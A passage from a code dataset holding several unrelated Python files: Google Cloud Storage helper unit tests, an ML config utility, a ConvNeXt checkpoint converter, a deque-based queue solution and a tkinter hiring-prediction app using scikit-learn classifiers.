path(self):\n return path\n\n @property\n def user_project(self):\n return user_project\n\n def _encryption_headers(self):\n return self._actual_encryption_headers or {}\n\n return Derived\n\n def test_path_is_abstract(self):\n mixin = self._make_one()\n with self.assertRaises(NotImplementedError):\n mixin.path\n\n def test_client_is_abstract(self):\n mixin = self._make_one()\n with self.assertRaises(NotImplementedError):\n mixin.client\n\n def test_user_project_is_abstract(self):\n mixin = self._make_one()\n with self.assertRaises(NotImplementedError):\n mixin.user_project\n\n def test__encryption_headers(self):\n mixin = self._make_one()\n self.assertEqual(mixin._encryption_headers(), {})\n\n def test__query_params_wo_user_project(self):\n derived = self._derivedClass(\"/path\", None)()\n self.assertEqual(derived._query_params, {})\n\n def test__query_params_w_user_project(self):\n user_project = \"user-project-123\"\n derived = self._derivedClass(\"/path\", user_project)()\n self.assertEqual(derived._query_params, {\"userProject\": user_project})\n\n def test_reload_w_defaults(self):\n path = \"/path\"\n response = {\"foo\": \"Foo\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived.client = client\n\n derived.reload()\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\"projection\": \"noAcl\"}\n expected_headers = {} # no encryption headers by default\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=expected_headers,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY,\n _target_object=derived,\n )\n\n def test_reload_w_etag_match(self):\n etag = \"kittens\"\n path = \"/path\"\n response = {\"foo\": \"Foo\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived.client = client\n\n derived.reload(\n if_etag_match=etag,\n )\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"noAcl\",\n }\n # no encryption headers by default\n expected_headers = {\n \"If-Match\": etag,\n }\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=expected_headers,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY,\n _target_object=derived,\n )\n\n def test_reload_w_generation_match_w_timeout(self):\n generation_number = 9\n metageneration_number = 6\n path = \"/path\"\n timeout = 42\n response = {\"foo\": \"Foo\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived.client = client\n\n derived.reload(\n if_generation_match=generation_number,\n if_metageneration_match=metageneration_number,\n timeout=timeout,\n )\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"noAcl\",\n \"ifGenerationMatch\": generation_number,\n \"ifMetagenerationMatch\": metageneration_number,\n }\n expected_headers = {} # no encryption headers by default\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=expected_headers,\n timeout=timeout,\n retry=DEFAULT_RETRY,\n _target_object=derived,\n )\n\n def test_reload_w_user_project_w_retry(self):\n user_project = \"user-project-123\"\n path = \"/path\"\n retry = mock.Mock(spec=[])\n response = {\"foo\": \"Foo\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path, user_project)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived.client = client\n\n derived.reload(retry=retry)\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"noAcl\",\n \"userProject\": user_project,\n }\n expected_headers = {} # no encryption headers by default\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=expected_headers,\n timeout=self._get_default_timeout(),\n retry=retry,\n _target_object=derived,\n )\n\n def test_reload_w_projection_w_explicit_client_w_enc_header(self):\n path = \"/path\"\n response = {\"foo\": \"Foo\"}\n encryption_headers = {\"bar\": \"Bar\"}\n client = mock.Mock(spec=[\"_get_resource\"])\n client._get_resource.return_value = response\n derived = self._derivedClass(path)()\n # Make sure changes is not a set instance before calling reload\n # (which will clear / replace it with an empty set), checked below.\n derived._changes = object()\n derived._actual_encryption_headers = encryption_headers\n\n derived.reload(projection=\"full\", client=client)\n\n self.assertEqual(derived._properties, response)\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\"projection\": \"full\"}\n client._get_resource.assert_called_once_with(\n path,\n query_params=expected_query_params,\n headers=encryption_headers,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY,\n _target_object=derived,\n )\n\n def test__set_properties(self):\n mixin = self._make_one()\n self.assertEqual(mixin._properties, {})\n VALUE = object()\n mixin._set_properties(VALUE)\n self.assertEqual(mixin._properties, VALUE)\n\n def test__patch_property(self):\n derived = self._derivedClass()()\n derived._patch_property(\"foo\", \"Foo\")\n self.assertEqual(derived._properties, {\"foo\": \"Foo\"})\n\n def test_patch_w_defaults(self):\n path = \"/path\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Ignore baz.\n client = derived.client = mock.Mock(spec=[\"_patch_resource\"])\n client._patch_resource.return_value = api_response\n\n derived.patch()\n\n self.assertEqual(derived._properties, api_response)\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_data = {\"bar\": bar}\n expected_query_params = {\"projection\": \"full\"}\n client._patch_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED,\n _target_object=derived,\n )\n\n def test_patch_w_metageneration_match_w_timeout_w_retry(self):\n path = \"/path\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Ignore baz.\n client = derived.client = mock.Mock(spec=[\"_patch_resource\"])\n client._patch_resource.return_value = api_response\n timeout = 42\n retry = mock.Mock(spec=[])\n generation_number = 9\n metageneration_number = 6\n\n derived.patch(\n if_generation_match=generation_number,\n if_metageneration_match=metageneration_number,\n timeout=timeout,\n retry=retry,\n )\n\n self.assertEqual(derived._properties, {\"foo\": \"Foo\"})\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_data = {\"bar\": bar}\n expected_query_params = {\n \"projection\": \"full\",\n \"ifGenerationMatch\": generation_number,\n \"ifMetagenerationMatch\": metageneration_number,\n }\n client._patch_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=timeout,\n retry=retry,\n _target_object=derived,\n )\n\n def test_patch_w_user_project_w_explicit_client(self):\n path = \"/path\"\n user_project = \"user-project-123\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path, user_project)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Ignore baz.\n client = mock.Mock(spec=[\"_patch_resource\"])\n client._patch_resource.return_value = api_response\n\n derived.patch(client=client)\n\n self.assertEqual(derived._properties, {\"foo\": \"Foo\"})\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_data = {\"bar\": bar}\n expected_query_params = {\n \"projection\": \"full\",\n \"userProject\": user_project,\n }\n client._patch_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED,\n _target_object=derived,\n )\n\n def test_update_w_defaults(self):\n path = \"/path\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n expected_data = derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Update sends 'baz' anyway.\n client = derived.client = mock.Mock(spec=[\"_put_resource\"])\n client._put_resource.return_value = api_response\n\n derived.update()\n\n self.assertEqual(derived._properties, api_response)\n # Make sure changes get reset by update().\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\"projection\": \"full\"}\n client._put_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=self._get_default_timeout(),\n retry=DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED,\n _target_object=derived,\n )\n\n def test_update_with_metageneration_not_match_w_timeout_w_retry(self):\n path = \"/path\"\n generation_number = 6\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n expected_data = derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Update sends 'baz' anyway.\n client = derived.client = mock.Mock(spec=[\"_put_resource\"])\n client._put_resource.return_value = api_response\n timeout = 42\n\n derived.update(\n if_metageneration_not_match=generation_number,\n timeout=timeout,\n )\n\n self.assertEqual(derived._properties, {\"foo\": \"Foo\"})\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"full\",\n \"ifMetagenerationNotMatch\": generation_number,\n }\n client._put_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=timeout,\n retry=DEFAULT_RETRY_IF_METAGENERATION_SPECIFIED,\n _target_object=derived,\n )\n\n def test_update_w_user_project_w_retry_w_explicit_client(self):\n user_project = \"user-project-123\"\n path = \"/path\"\n api_response = {\"foo\": \"Foo\"}\n derived = self._derivedClass(path, user_project)()\n # Make sure changes is non-empty, so we can observe a change.\n bar = object()\n baz = object()\n expected_data = derived._properties = {\"bar\": bar, \"baz\": baz}\n derived._changes = set([\"bar\"]) # Update sends 'baz' anyway.\n client = mock.Mock(spec=[\"_put_resource\"])\n client._put_resource.return_value = api_response\n retry = mock.Mock(spec=[])\n\n derived.update(client=client, retry=retry)\n # Make sure changes get reset by patch().\n self.assertEqual(derived._changes, set())\n\n expected_query_params = {\n \"projection\": \"full\",\n \"userProject\": user_project,\n }\n client._put_resource.assert_called_once_with(\n path,\n expected_data,\n query_params=expected_query_params,\n timeout=self._get_default_timeout(),\n retry=retry,\n _target_object=derived,\n )\n\n\nclass Test__scalar_property(unittest.TestCase):\n def _call_fut(self, fieldName):\n from google.cloud.storage._helpers import _scalar_property\n\n return _scalar_property(fieldName)\n\n def test_getter(self):\n class Test(object):\n def __init__(self, **kw):\n self._properties = kw.copy()\n\n do_re_mi = self._call_fut(\"solfege\")\n\n test = Test(solfege=\"Latido\")\n self.assertEqual(test.do_re_mi, \"Latido\")\n\n def test_setter(self):\n class Test(object):\n def _patch_property(self, name, value):\n self._patched = (name, value)\n\n do_re_mi = self._call_fut(\"solfege\")\n\n test = Test()\n test.do_re_mi = \"Latido\"\n self.assertEqual(test._patched, (\"solfege\", \"Latido\"))\n\n\nclass Test__base64_md5hash(unittest.TestCase):\n def _call_fut(self, bytes_to_sign):\n from google.cloud.storage._helpers import _base64_md5hash\n\n return _base64_md5hash(bytes_to_sign)\n\n def test_it(self):\n from io import BytesIO\n\n BYTES_TO_SIGN = b\"FOO\"\n BUFFER = BytesIO()\n BUFFER.write(BYTES_TO_SIGN)\n BUFFER.seek(0)\n\n SIGNED_CONTENT = self._call_fut(BUFFER)\n self.assertEqual(SIGNED_CONTENT, b\"kBiQqOnIz21aGlQrIp/r/w==\")\n\n def test_it_with_stubs(self):\n import mock\n\n class _Buffer(object):\n def __init__(self, return_vals):\n self.return_vals = return_vals\n self._block_sizes = []\n\n def read(self, block_size):\n self._block_sizes.append(block_size)\n return self.return_vals.pop()\n\n BASE64 = _Base64()\n DIGEST_VAL = object()\n BYTES_TO_SIGN = b\"BYTES_TO_SIGN\"\n BUFFER = _Buffer([b\"\", BYTES_TO_SIGN])\n MD5 = _MD5(DIGEST_VAL)\n\n patch = mock.patch.multiple(\n \"google.cloud.storage._helpers\", base64=BASE64, md5=MD5\n )\n with patch:\n SIGNED_CONTENT = self._call_fut(BUFFER)\n\n self.assertEqual(BUFFER._block_sizes, [8192, 8192])\n self.assertIs(SIGNED_CONTENT, DIGEST_VAL)\n self.assertEqual(BASE64._called_b64encode, [DIGEST_VAL])\n self.assertEqual(MD5._called, [None])\n self.assertEqual(MD5.hash_obj.num_digest_calls, 1)\n self.assertEqual(MD5.hash_obj._blocks, [BYTES_TO_SIGN])\n\n\nclass Test__add_etag_match_headers(unittest.TestCase):\n def _call_fut(self, headers, **match_params):\n from google.cloud.storage._helpers import _add_etag_match_headers\n\n return _add_etag_match_headers(headers, **match_params)\n\n def test_add_etag_match_parameters_str(self):\n ETAG = \"kittens\"\n headers = {\"foo\": \"bar\"}\n EXPECTED_HEADERS = {\n \"foo\": \"bar\",\n \"If-Match\": ETAG,\n }\n self._call_fut(headers, if_etag_match=ETAG)\n self.assertEqual(headers, EXPECTED_HEADERS)\n\n def test_add_generation_match_parameters_list(self):\n ETAGS = [\"kittens\", \"fluffy\"]\n EXPECTED_HEADERS = {\n \"foo\": \"bar\",\n \"If-Match\": \", \".join(ETAGS),\n }\n headers = {\"foo\": \"bar\"}\n self._call_fut(headers, if_etag_match=ETAGS)\n self.assertEqual(headers, EXPECTED_HEADERS)\n\n\nclass Test__add_generation_match_parameters(unittest.TestCase):\n def _call_fut(self, params, **match_params):\n from google.cloud.storage._helpers import _add_generation_match_parameters\n\n return _add_generation_match_parameters(params, **match_params)\n\n def test_add_generation_match_parameters_list(self):\n GENERATION_NUMBER = 9\n METAGENERATION_NUMBER = 6\n EXPECTED_PARAMS = [\n (\"param1\", \"value1\"),\n (\"param2\", \"value2\"),\n (\"ifGenerationMatch\", GENERATION_NUMBER),\n (\"ifMetagenerationMatch\", METAGENERATION_NUMBER),\n ]\n params = [(\"param1\", \"value1\"), (\"param2\", \"value2\")]\n self._call_fut(\n params,\n if_generation_match=GENERATION_NUMBER,\n if_metageneration_match=METAGENERATION_NUMBER,\n )\n self.assertEqual(params, EXPECTED_PARAMS)\n\n def test_add_generation_match_parameters_dict(self):\n GENERATION_NUMBER = 9\n METAGENERATION_NUMBER = 6\n EXPECTED_PARAMS = {\n \"param1\": \"value1\",\n \"param2\": \"value2\",\n \"ifGenerationMatch\": GENERATION_NUMBER,\n \"ifMetagenerationMatch\": METAGENERATION_NUMBER,\n }\n\n params = {\"param1\": \"value1\", \"param2\": \"value2\"}\n self._call_fut(\n params,\n if_generation_match=GENERATION_NUMBER,\n if_metageneration_match=METAGENERATION_NUMBER,\n )\n self.assertEqual(params, EXPECTED_PARAMS)\n\n def test_add_generation_match_parameters_tuple(self):\n GENERATION_NUMBER = 9\n METAGENERATION_NUMBER = 6\n\n params = ((\"param1\", \"value1\"), (\"param2\", \"value2\"))\n with self.assertRaises(ValueError):\n self._call_fut(\n params,\n if_generation_match=GENERATION_NUMBER,\n if_metageneration_match=METAGENERATION_NUMBER,\n )\n\n\nclass Test__bucket_bound_hostname_url(unittest.TestCase):\n def _call_fut(self, **args):\n from google.cloud.storage._helpers import _bucket_bound_hostname_url\n\n return _bucket_bound_hostname_url(**args)\n\n def test_full_hostname(self):\n HOST = \"scheme://domain.tcl\"\n self.assertEqual(self._call_fut(host=HOST), HOST)\n\n def test_hostname_and_scheme(self):\n HOST = \"domain.tcl\"\n SCHEME = \"scheme\"\n EXPECTED_URL = SCHEME + \"://\" + HOST\n\n self.assertEqual(self._call_fut(host=HOST, scheme=SCHEME), EXPECTED_URL)\n\n\nclass Test__api_core_retry_to_resumable_media_retry(unittest.TestCase):\n def test_conflict(self):\n from google.cloud.storage._helpers import (\n _api_core_retry_to_resumable_media_retry,\n )\n\n with self.assertRaises(ValueError):\n _api_core_retry_to_resumable_media_retry(retry=DEFAULT_RETRY, num_retries=2)\n\n def test_retry(self):\n from google.cloud.storage._helpers import (\n _api_core_retry_to_resumable_media_retry,\n )\n\n retry_strategy = _api_core_retry_to_resumable_media_retry(retry=DEFAULT_RETRY)\n self.assertEqual(retry_strategy.max_sleep, DEFAULT_RETRY._maximum)\n self.assertEqual(retry_strategy.max_cumulative_retry, DEFAULT_RETRY._deadline)\n self.assertEqual(retry_strategy.initial_delay, DEFAULT_RETRY._initial)\n self.assertEqual(retry_strategy.multiplier, DEFAULT_RETRY._multiplier)\n\n def test_num_retries(self):\n from google.cloud.storage._helpers import (\n _api_core_retry_to_resumable_media_retry,\n )\n\n retry_strategy = _api_core_retry_to_resumable_media_retry(\n retry=None, num_retries=2\n )\n self.assertEqual(retry_strategy.max_retries, 2)\n\n def test_none(self):\n from google.cloud.storage._helpers import (\n _api_core_retry_to_resumable_media_retry,\n )\n\n retry_strategy = _api_core_retry_to_resumable_media_retry(retry=None)\n self.assertEqual(retry_strategy.max_retries, 0)\n\n\nclass _MD5Hash(object):\n def __init__(self, digest_val):\n self.digest_val = digest_val\n self.num_digest_calls = 0\n self._blocks = []\n\n def update(self, block):\n self._blocks.append(block)\n\n def digest(self):\n self.num_digest_calls += 1\n return self.digest_val\n\n\nclass _MD5(object):\n def __init__(self, digest_val):\n self.hash_obj = _MD5Hash(digest_val)\n self._called = []\n\n def __call__(self, data=None):\n self._called.append(data)\n return self.hash_obj\n\n\nclass _Base64(object):\n def __init__(self):\n self._called_b64encode = []\n\n def b64encode(self, value):\n self._called_b64encode.append(value)\n return value\n","repo_name":"googleapis/python-storage","sub_path":"tests/unit/test__helpers.py","file_name":"test__helpers.py","file_ext":"py","file_size_in_byte":25175,"program_lang":"python","lang":"en","doc_type":"code","stars":346,"dataset":"github-code","pt":"23"} +{"seq_id":"33192884283","text":"import numpy as np\n\n\ndef get_ratio_scale(config):\n \"\"\"Calculate ratio_scale from other configs\"\"\"\n\n kp_input_size = config.kp_input_size\n kp_base_scale = config.kp_base_scale\n ratio_scale = (float(kp_input_size) / 2.0) / kp_base_scale\n\n return ratio_scale\n\n\ndef get_patch_size_no_aug(config):\n \"\"\"Determine large patch size without rotation augmentations\"\"\"\n\n desc_input_size = config.desc_input_size\n desc_support_ratio = config.desc_support_ratio\n\n ratio_scale = get_ratio_scale(config)\n patch_size = np.round(\n float(desc_input_size) * ratio_scale / desc_support_ratio)\n\n return patch_size\n\n\ndef get_patch_size(config):\n \"\"\"Get the large patch size from other configs\"\"\"\n\n patch_size = get_patch_size_no_aug(config)\n if config.use_augmented_set:\n patch_size = np.ceil(np.sqrt(2) * patch_size)\n\n return patch_size\n\n\n#\n# config.py ends here\n","repo_name":"cvlab-epfl/tf-lift","sub_path":"utils/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"23"} +{"seq_id":"4856453703","text":"import torch\nimport argparse\n\n# For D2, we need to convert nn.Parameters to nn.Embedding\n# this script is used to convert the original ckpt to the needed form\n\ndef parse_args():\n parser = argparse.ArgumentParser(\"ConvNeXt converter\")\n\n parser.add_argument(\"--source_model\", default=\"weights/convnext_tiny_1k_224_ema.pth\", type=str, help=\"Path or url to the DETR model to convert\")\n parser.add_argument(\"--output_model\", default=\"weights/convnext_tiny_1k_224_ema_new.pth\", type=str, help=\"Path where to save the converted model\")\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n ckpt = torch.load(args.source_model, map_location=\"cpu\")\n state_dict = ckpt[\"model\"]\n change_list = [\"downsample_layers.0.1.bias\", \"downsample_layers.0.1.weight\",\n \"downsample_layers.1.0.bias\", \"downsample_layers.1.0.weight\",\n \"downsample_layers.2.0.bias\", \"downsample_layers.2.0.weight\",\n \"downsample_layers.3.0.bias\", \"downsample_layers.3.0.weight\"]\n # new ckpt\n ckpt_new = {\"model\":{}}\n for k in state_dict.keys():\n if (\"gamma\" in k) or (\"norm\" in k) or k in change_list:\n ckpt_new[\"model\"][k+\".weight\"] = state_dict[k].unsqueeze(0)\n else:\n ckpt_new[\"model\"][k] = state_dict[k]\n torch.save(ckpt_new, args.output_model)","repo_name":"MasterBin-IIAU/UNINEXT","sub_path":"conversion/convert_convnext.py","file_name":"convert_convnext.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":1348,"dataset":"github-code","pt":"23"} +{"seq_id":"35813533214","text":"# 큐 2 (실4)\n# https://www.acmicpc.net/problem/18258\n\n# 시간제한 있는 문제 (3초)\n\n'''\n큐 문제 풀어보기\n\n큐(queue)\n선입선출\n쌓이는 것은 뒤로만 쌓이고 빼는건 앞에서부터 뺀다.\n\n\n(확인요망)빼고나서 인덱스가 당겨지지 않는다. 뺀 공간은 빈자리로 남겨둔다. (새롭게 채워넣지 않음)\n문제를 풀때 가장 앞자리 인덱스가 0으로 된 것을 확인했다..\n\n\n���같은 큐 라면 덱을 사용해서 풀어도 되는지?\n\n'''\n\n# 1. 덱을 이용해서 풀어보기 ============\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nd = deque()\n\nfor i in range(n):\n input_ord = input().split()\n order = input_ord[0]\n\n if order == 'push':\n d.append(input_ord[1])\n \n elif order == 'pop':\n if len(d) == 0:\n print(-1)\n else:\n print(d.popleft())\n \n elif order == 'size':\n print(len(d))\n \n elif order == 'empty':\n if len(d) == 0:\n print(1)\n else:\n print(0)\n elif order == 'front':\n if len(d) == 0:\n print(-1)\n else:\n print(d[0]) # deque의 경우도 앞의 값이 빠지면 인덱스가 0으로 되는걸...??\n elif order == 'back':\n if len(d) == 0:\n print(-1)\n else:\n print(d[-1]) \n \n\n\n\n","repo_name":"bbugi/python_algorithm","sub_path":"backjoon/완료/18258(실4).py","file_name":"18258(실4).py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"22791208250","text":"from tkinter import *\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn import tree\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import svm,datasets\nimport csv\n#pa =\"E:\\\\Abhi\\\\python\\\\New folder\\\\PerpData1.csv\"\ndf=pd.read_csv('E:\\\\Abhi\\\\python\\\\New folder\\\\PerpData1.csv')\n\nwin=Tk()\nframe1=Frame(win, width=200, height=130)\nframe2=Frame(win, width=200, height=130)\nframe3=Frame(win, width=400, height=50)\n\nwin.title('Hire Predictor')\nX=df[['PERCENTAGE','BACKLOG','INTERNSHIP','FIRSTROUND','COMMUNICATIONSKILLLS']]\ny=df[['Hired']]\ndef Logistic():\n global result\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n X_train,X_test,y_train,y_test=train_test_split(X,y,test_size=0.3,random_state=0)\n model2=LogisticRegression()\n model2.fit(X_train,y_train)\n l=[a,b,c,d,e]\n l=np.array(l)\n l=np.array([l]).reshape(1,-1)\n result=model2.predict(l)\n if result==1:\n result='Hired'\n else:\n result=\"Not Hired\"\n out.delete('1.0',END)\n out.insert(END,result)\n return result\ndef Decision_Tree():\n global result1\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n clf=tree.DecisionTreeClassifier()\n clf=clf.fit(X,y)\n l=[a,b,c,d,e]\n l=np.array(l)\n l=np.array([l]).reshape(1,-1)\n result1=clf.predict(l)\n if result1==1:\n result1='Hired'\n else:\n result1=\"Not Hired\"\n out1.delete('1.0',END)\n out1.insert(END,result1)\n return result1\ndef Random_Forest():\n global result2\n clf2=RandomForestClassifier(n_estimators=10)\n clf2=clf2.fit(X,y)\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n l=[a,b,c,d,e]\n l=np.array(l)\n l=np.array([l]).reshape(1,-1)\n result2=clf2.predict(l)\n if result2==1:\n result2='Hired'\n else:\n result2=\"Not Hired\"\n out2.delete('1.0',END)\n out2.insert(END,result2)\n return result2\ndef SVM():\n global result3\n C=2.0\n svc=svm.SVC(kernel='linear',C=C)\n svc=svc.fit(X,y)\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n l=[a,b,c,d,e]\n l=np.array(l)\n l=np.array([l]).reshape(1,-1)\n result3=svc.predict(l)\n if result3==1:\n result3='Hired'\n else:\n result3=\"Not Hired\"\n out3.delete('1.0',END)\n out3.insert(END,result3)\n return result3\ndef res():\n b1=result\n b2=result1\n b3=result2\n b4=result3\n if b1=='Hired' and b2=='Hired' and b3=='Hired' and b4=='Hired':\n fresult='Hired'\n elif b1=='Hired' and b2=='Hired' and b3=='Hired':\n fresult='Hired'\n elif b1=='Hired' and b2=='Hired' and b4=='Hired':\n fresult='Hired'\n elif b2=='Hired' and b3=='Hired' and b4=='Hired':\n fresult='Hired'\n elif b1=='Hired' and b3=='Hired' and b4=='Hired':\n fresult='Hired'\n else:\n fresult='Not Hired'\n out4.delete('1.0',END)\n out4.insert(END,fresult)\n if fresult=='Hired':\n res=1\n else:\n res=0\n x=var1.get()\n a=var2.get()\n b=var3.get()\n c=var4.get()\n d=var5.get()\n e=var6.get()\n row = [x,a,b,c,d,e,res]\n with open('E:\\\\Abhi\\\\python\\\\New folder\\\\PerpData1.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow(row)\n csvFile.close()\n return\n# def mess():\n# tkinter.messagebox.showinfo('window Title','Hired')\n# made by abhishek bhardwaj jims student git profile : https://github.com/abhi7104\n# tkinter.messagebox.showinfo('window Title','Not Hired')\n# return\n#win.configure(bg='brown')\nheading = Label(win, text='Hire Predictor',bg='brown',fg='white',font = ('Aerial' , 25),borderwidth = 10) \n\n\nname=Label(frame1, text='Name :',font=20,pady=9)\npercentage=Label(frame1,text='Percentage :',font=20,padx=9,pady=9)\nbacklogs=Label(frame1,text='Backlogs :',font=20,padx=9,pady=9)\ninternship=Label(frame1,text='Internship :',font=20,padx=9,pady=9)\nfirstround=Label(frame1,text=\"Firstround :\",font=20,padx=9,pady=9)\ncommunication=Label(frame1,text='Communication :',font=20,padx=9,pady=9)\n\n\nvar1=StringVar()\nvar2=IntVar()\nvar3=IntVar()\nvar4=IntVar()\nvar5=IntVar()\nvar6=IntVar()\n\nnam=Entry(frame1,text=var1,bd=3)\nper=Entry(frame1,text=var2,bd=3)\nbackl=Entry(frame1,text=var3,bd=3)\ninte=Entry(frame1,text=var4,bd=3)\nfirs=Entry(frame1,text=var5,bd=3)\ncomm=Entry(frame1,text=var6,bd=3)\n\nbutton=Button(frame2,text='Logistic',font=('Courier',11),relief=RAISED,width=13,bd=5,justify=CENTER,command=Logistic)\nbutton1=Button(frame2,text='Decision Tree',font=('Courier',11),relief=RAISED,width=13,bd=5,justify=CENTER,command=Decision_Tree)\nbutton2=Button(frame2,text='Random Forest',font=('Courier',11),relief=RAISED,width=13,bd=5,justify=CENTER,command=Random_Forest)\nbutton3=Button(frame2,text='SVM',font=('Courier',11),relief=RAISED,width=13,bd=5,justify=CENTER,command=SVM)\nresult=Button(frame3,text='Final Result',font=('Courier',11),bd=5,width=13,command=res)\n\n# algo=Label(frame2, text='algo',font=20,bg='brown',fg='white', borderwidth=2,relief='solid')\n# algo1=Label(win,text='algo1',font=20,bg='brown',fg='white', borderwidth=2,relief='solid')\n# algo2=Label(win,text='algo2',font=20,bg='brown',fg='white', borderwidth=2,relief='solid')\n# algo3=Label(win,text='algo3',font=20,bg='brown',fg='white', borderwidth=2,relief='solid')\n# made by abhishek bhardwaj jims student git profile : https://github.com/abhi7104\nout=Text(frame2,height=3,width=8,padx=10,bd=3)\nout1=Text(frame2,height=3,width=8,bd=3,padx=10)\nout2=Text(frame2,height=3,width=8,bd=3,padx=10)\nout3=Text(frame2,height=3,width=8,bd=3,padx=10)\nout4=Text(frame3,height=3,width=8,bd=3,padx=10)\n\nframe1.grid(row=10,column=3)\nframe2.grid(row=10,column=9)\nframe3.grid(row=11,column=3)\n\nheading.grid(row=0,column=3)\nname.grid(row=2,sticky=E)\npercentage.grid(row=7,sticky=E)\nbacklogs.grid(row=13,sticky=E)\ninternship.grid(row=18,sticky=E)\nfirstround.grid(row=23,sticky=E)\ncommunication.grid(row=28,sticky=E)\n\nnam.grid(row=2,column=5)\nper.grid(row=7,column=5)\nbackl.grid(row=13,column=5)\ninte.grid(row=18,column=5)\nfirs.grid(row=23,column=5)\ncomm.grid(row=28,column=5)\n\nbutton.grid(row=7,column=3,padx=20, pady=10)\nbutton1.grid(row=13,column=3,padx=10, pady=10)\nbutton2.grid(row=18,column=3,padx=10, pady=10)\nbutton3.grid(row=23,column=3,padx=10, pady=10)\n\n\n# algo.grid(row=30,column=0)\n# algo1.grid(row=30,column=4)\n# algo2.grid(row=30,column=8)\n# algo3.grid(row=30,column=12)\n\n\nout.grid(row=7,column=10,padx=10, pady=10)\nout1.grid(row=13,column=10,padx=10, pady=10)\nout2.grid(row=18,column=10,padx=10, pady=10)\nout3.grid(row=23,column=10,padx=10, pady=10)\nout4.grid(row=14,column=10,padx=10, pady=10)\nresult.grid(row=12,column=18)\nwin.mainloop()","repo_name":"abhi7104/Hiring-Predictor","sub_path":"hiring predictor.py","file_name":"hiring 